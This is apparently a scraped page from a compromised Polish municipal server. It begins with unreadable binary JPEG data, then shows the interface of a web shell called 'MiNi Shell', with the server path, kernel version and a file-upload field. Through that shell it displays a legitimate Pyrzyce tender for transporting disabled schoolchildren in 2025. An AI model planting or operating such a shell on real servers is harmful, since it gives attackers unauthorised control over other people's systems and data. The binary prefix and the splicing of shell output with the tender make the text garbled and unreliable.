JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241125/0061278201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz dzieci, uczniów i wychowanków w tym niepełnosprawnych z miejsca zamieszkania znajdującego się na terenie Gminy Pyrzyce </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Pyrzyce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811685711</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Ratuszowy 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pyrzyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">74-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL427 - Szczecinecko-pyrzycki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">091/ 39 70 310</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">091/39 70 314</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@pyrzyce.um.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pyrzyce.um.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz dzieci, uczniów i wychowanków w tym niepełnosprawnych z miejsca zamieszkania znajdującego się na terenie Gminy Pyrzyce </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-abd8073e-9d80-4d06-942a-acafc61ef073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00612782</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00032264/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Dowóz dzieci, uczniów i wychowanków w tym niepełnosprawnych z miejsca zamieszkania znajdującego się na terenie Gminy Pyrzyce</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/um_pyrzyce <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/um_pyrzyce</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym a<br/>Wykonawcami, w szczególności składanie zapytań,<br/>oświadczeń, wniosków, zawiadomień, jak również przekazywanie informacji odbywa się przy użyciu<br/>Platformy Zakupowej, dostępnej pod adresem https://platformazakupowa.pl/pn/smigiel.2. Wymagania<br/>techniczne i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej opisane<br/>zostały w:1) „Regulaminie Internetowej Platformy zakupowej platformazakupowa.pl Open Nexus Sp. z<br/>o. o.” dostępnym pod adresem https://platformazakupowa.pl/strona/1-regulamin oraz 2) „Instrukcji dla<br/>wykonawców” dostępnej pod adresem https://platformazakupowa.pl/strona/45-instrukcje.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z dnia 4 maja 2016 r., str. 1), dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest Urząd Miejski w Pyrzycach, Plac Ratuszowy 1, 74-200 Pyrzyce;<br/>2) Inspektor ochrony danych urzęduje w Urzędzie Miejskim w Pyrzycach , Plac Ratuszowy 1, 74-200 Pyrzyce, tel. 91 39 70 317,<br/>email:<br/>iod@pyrzyce.um.gov.pl od poniedziałku – piątku w godzinach od 7:00-15:00;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego na „Dowóz dzieci, uczniów i wychowanków w tym niepełnosprawnych z miejsca zamieszkania<br/>znajdującego się na terenie Gminy Pyrzyce do Niepublicznego Przedszkola Specjalnego „Puchatek” w Pyrzycach, Ośrodka<br/>Rehabilitacyjno- Edukacyjno- Wychowawczego oraz Niepublicznej Szkoły Przysposabiającej do Pracy w Nowielinie, Specjalnego<br/>Ośrodka Szkolno–Wychowawczego im. Jana Brzechwy w Pyrzycach, Zespołu Szkół Specjalnych im. J. Tuwima w Stargardzie,<br/>Specjalnego Ośrodka Szkolno- Wychowawczego im. Janusza Korczaka w Policach, w roku szkolnym 2023/2024 oraz 2024/2025 i<br/>odwożeniu trasą powrotną po zakończeniu nauki szkolnej”.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 Ustawy PZP,<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Ustawy PZP, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach Ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z Ustawy;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO;<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">EKSiZ.271.18.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zamówienie obejmuje:<br/>„Dowóz dzieci, uczniów i wychowanków w tym niepełnosprawnych z miejsca zamieszkania znajdującego się na terenie Gminy Pyrzyce do Niepublicznego Przedszkola Specjalnego „Puchatek” w Pyrzycach, Ośrodka Rehabilitacyjno - Edukacyjno- Wychowawczego oraz Niepublicznej Szkoły Przysposabiającej do Pracy w Nowielinie, Specjalnego Ośrodka Szkolno–Wychowawczego im. Jana Brzechwy w Pyrzycach, Zespołu Szkół Specjalnych im. J. Tuwima w Stargardzie, Specjalnego Ośrodka Szkolno- Wychowawczego im. Janusza Korczaka w Policach, od 2 stycznia 2025 r. do 31 grudnia 2025 r. i odwożeniu trasą powrotną po zakończeniu nauki szkolnej”.<br/>2. Przedmiotem zamówienia jest realizacja dowozu i odwozu dzieci niepełnosprawnych z miejsca zamieszkania znajdującego się na terenie Gminy Pyrzyce do Niepublicznego Przedszkola Specjalnego „Puchatek” w Pyrzycach, Ośrodka Rehabilitacyjno- Edukacyjno-Wychowawczego oraz Niepublicznej Szkoły Przysposabiającej do Pracy w Nowielinie, Specjalnego Ośrodka Szkolno–Wychowawczego im. Jana Brzechwy w Pyrzycach, Zespołu Szkół Specjalnych im. J. Tuwima w Stargardzie, Specjalnego Ośrodka Szkolno - Wychowawczego im. Janusza Korczaka w Policach, – zwanych dalej w treści SWZ „szkołą”, w których realizują lub realizować będą obowiązek szkolny lub nauki od 2 stycznia 2025 r. do 31 grudnia 2025 r. Świadczenie usług odbywać się będzie samochodami specjalistycznymi dostosowanymi do przewozu osób niepełnosprawnych wraz zapewnieniem im stosownej do charakteru niepełnosprawności opieki w czasie dowożenia, pomocy podczas wsiadania i wysiadania z miejsca zamieszkania na terenie Gminy Pyrzyce i odwożeniu trasą powrotną po zakończeniu nauki szkolnej.<br/>3. Zamawiający informuje o szacunkowej liczbie uczniów dowożonych do poszczególnych szkół:<br/>1)	Niepubliczne Przedszkole Specjalne „Puchatek” w Pyrzycach, ul. Poznańska 1:<br/>a)	Letnin – 1 uczeń<br/>b)	Brzezin- 1 uczeń<br/>c)	Krzemlin – 2 uczniów<br/>d)	Mielęcin – 1 uczeń<br/>e)	Obojno- 1 uczeń<br/>f)	Mechowo -1 uczeń<br/>g)	Pstrowice- 1 uczeń<br/><br/><br/>2)	Ośrodek Rehabilitacyjno-Edukacyjno-Wychowawczy i Niepubliczna Szkoła Przysposabiająca do Pracy, Nowielin 40:<br/>a)	Pyrzyce ul. Plac Ratuszowy – 8 uczniów<br/>b)	Żabów – 2 uczniów<br/>c)	Pstrowice – 1 uczeń<br/>d)	Stróżewo – 1 uczeń<br/>3)	Specjalny Ośrodek Szkolno–Wychowawczy im. Jana Brzechwy w Pyrzycach, ul. Słowackiego 1 :<br/>a)	Brzesko – 1 uczeń<br/>b)	Stróżewo– 1 uczeń<br/>c)	Obojno- 1 uczeń<br/>	<br/>4)	Zespół Szkół Specjalnych im. J. Tuwima w Stargardzie ul. Wita Stwosza 1a/16:<br/>a)	Pyrzyce ul. Bankowa	– 1 uczeń<br/>b)	Pyrzyce ul. Krótka – 1 uczeń<br/>c)	Pyrzyce ul. Dworcowa – 1 uczeń<br/><br/>5)	Specjalny Ośrodek Szkolno - Wychowawczy ul. Janusza Korczaka w Policach:<br/>a)	Pyrzyce ul. Jana Pawła II – 1 uczeń<br/><br/>5. W ciągu jednego dnia realizacji usługi przewidzianych jest do dowiezienia 27 uczniów niepełnosprawnych. Liczba dzieci niepełnosprawnych może ulec zmianie.<br/>6. Szacunkowy dzienny przewóz uczniów z domu do szkoły i ze szkoły do domu (łącznie rano i po południu) wynosić będzie: ok. 470 kilometrów.<br/>7. Przed złożeniem oferty wymaga się od Wykonawcy zapoznania się z istniejącymi obecnie trasami przewozu, warunkami panującymi na nich, a w szczególności: kilometrami przewozu, szerokością dróg, siecią przystanków, lokalizacją miejsc nawrotu oraz wszystkich innych czynników mających wpływ na realizację przedmiotu zamówienia.<br/>8. Podana ilość kilometrów jest ilością szacunkową służącą do prawidłowego opracowania oferty. Liczba kilometrów może ulec zmianie o: -15% - +15% kilometrów dziennych w ciągu trwania umowy, o czym Zamawiający zawiadomi Wykonawcę<br/>9. Zamówienie obejmuje dowóz dzieci niepełnosprawnych z miejsca zamieszkania do szkoły<br/>i przywóz po zajęciach lekcyjnych do miejsca zamieszkania, na trasie: dom – szkoła – dom. Dowóz dzieci niepełnosprawnych odbywać się będzie w dni nauki szkolnej tj. od 02.01.2025 r. do 31.12.2025 r. zgodnie z kalendarzem roku szkolnego 2024/2025 oraz 2025/2026 codziennie<br/>z wyjątkiem dni ustawowo wolnych od zajęć, w szczególności ferii, wakacji i dni świątecznych.<br/>10. Przewóz realizowany będzie według planowanych tras przejazdu, godzin oraz ilości dzieci wykazanych w SWZ.<br/>11. Szczegółowe godziny dowożenia do szkół i odwożenia do miejsca zamieszkania, Wykonawca ustali z rodzicami (opiekunami prawnymi) w oparciu o tygodniowy plan zajęć szkolnych dowożonych uczniów i przedstawi na piśmie Zamawiającemu w terminie na co najmniej 7 dni przed przystąpieniem do realizacji usługi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>1. Cena- 70% (0,70),<br/>2. Liczba bezpłatnych kilometrów (nie mniej niż 1000km na przewozy ) -30% (0,30)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba bezpłatnych kilometrów (nie mniej niż 1000km na przewozy )</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. W postępowaniu mogą wziąć udział wyłącznie Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu dotyczące:<br/>1.1. kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej określonych w SWZ, oraz takich które wynikają z odrębnych przepisów;<br/>Warunek będzie spełniony jeżeli Wykonawca dysponuje ważną licencją lub obowiązującym zezwoleniem na wykonywanie krajowego transportu drogowego osób zgodnie z art. 7 ustawy<br/>z dnia 6 września 2001 roku o transporcie drogowym (t.j. Dz. U. z 2024 r., poz.728, z późn. zm.). Przy ocenie spełnienia tego warunku udziału przez Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia, posiadanie uprawnień, o których mowa powyżej, jest wymagane od każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia w takim zakresie,<br/>w jakim będą oni wykonywać usługę.<br/>1.2. zdolności techniczne lub zawodowe;<br/>W celu potwierdzenia spełnienia tego warunku Wykonawca wykaże, że:<br/>1)	Wykonawca posiada wiedzę i doświadczenie, tj. w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 1 usługę dowozu dzieci do szkół przez okres co najmniej 1 roku szkolnego, o wartości rocznej nie mniejszej niż 20.000,00 zł (wg załącznika nr 6 do SWZ);<br/>2)	Wykonawca dysponuje odpowiednim potencjałem technicznym tj. Wykonawca posiada minimum 2 pojazdy w tym 1 przystosowany do przewozu osób niepełnosprawnych dostosowanych do przewozu osób na wózku inwalidzkim, wyposażonych w windę-podnośnik, pasy mocujące wózek oraz pasy mocujące dziecko na wózku inwalidzkim, wraz z zapewnieniem im dodatkowej stosownej do charakteru niepełnosprawności opieki w czasie dowożenia oraz pomocy podczas wsiadania i wysiadania.<br/>3)	Wykonawca dysponuje odpowiednim potencjałem osobowym tj. co najmniej dwoma osobami posiadającymi ważne uprawnienia i badania lekarskie niezbędne do kierowania środkami transportu przeznaczonymi do przewozu osób (wg załącznika nr 8 do SWZ);<br/>1.3. sytuacji ekonomicznej lub finansowej zapewniającej wykonanie zamówienia;<br/>W celu potwierdzenia spełnienia tego warunku Wykonawca wykaże, że posiada odpowiednie ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę gwarancyjną nie niższą niż 500 000,00 zł.<br/>2. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu,<br/>w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy mogą polegać na zdolnościach innych podmiotów, WYŁĄCZNIE gdy podmioty te zrealizują usługi, do realizacji których te zdolności są wymagane.<br/>4. Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>5. Zamawiający ocenia, czy udostępniane Wykonawcy przez inne podmioty zdolności techniczne lub zawodowe, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału<br/>w postępowaniu oraz bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia,<br/>o których mowa w art. 108 ust. 1 pkt 1–6 i ust. 2 Ustawy PZP.<br/>6. Jeżeli zdolności techniczne lub zawodowe podmiotu udostępniającego potencjał, nie potwierdzają spełnienia przez Wykonawcę warunków udziału w postępowaniu, lub zachodzą wobec tych podmiotów podstawy wykluczenia, Zamawiający żąda, aby Wykonawca w terminie określonym przez Zamawiającego:<br/>1)	zastąpił ten podmiot innym podmiotem lub podmiotami bądź<br/>2)	zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże zdolności techniczne lub zawodowe lub sytuację finansową lub ekonomiczną. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający w niniejszym<br/>postępowaniu wymaga, aby wykonawcy wykazując brak podstaw do<br/>wykluczenia złożyli wymagane oświadczenia / dokumenty do oferty. Na podstawie art. 125 ust. 1<br/>ustawy Pzp w terminie składania ofert każdy z wykonawców składa oświadczenia o braku podstaw do<br/>wykluczenia z postępowania – Załącznik numer 3 do SWZ Zamawiający nie będzie wzywał<br/>wykonawcę, którego oferta zostanie najwyżej oceniona do złożenia podmiotowych 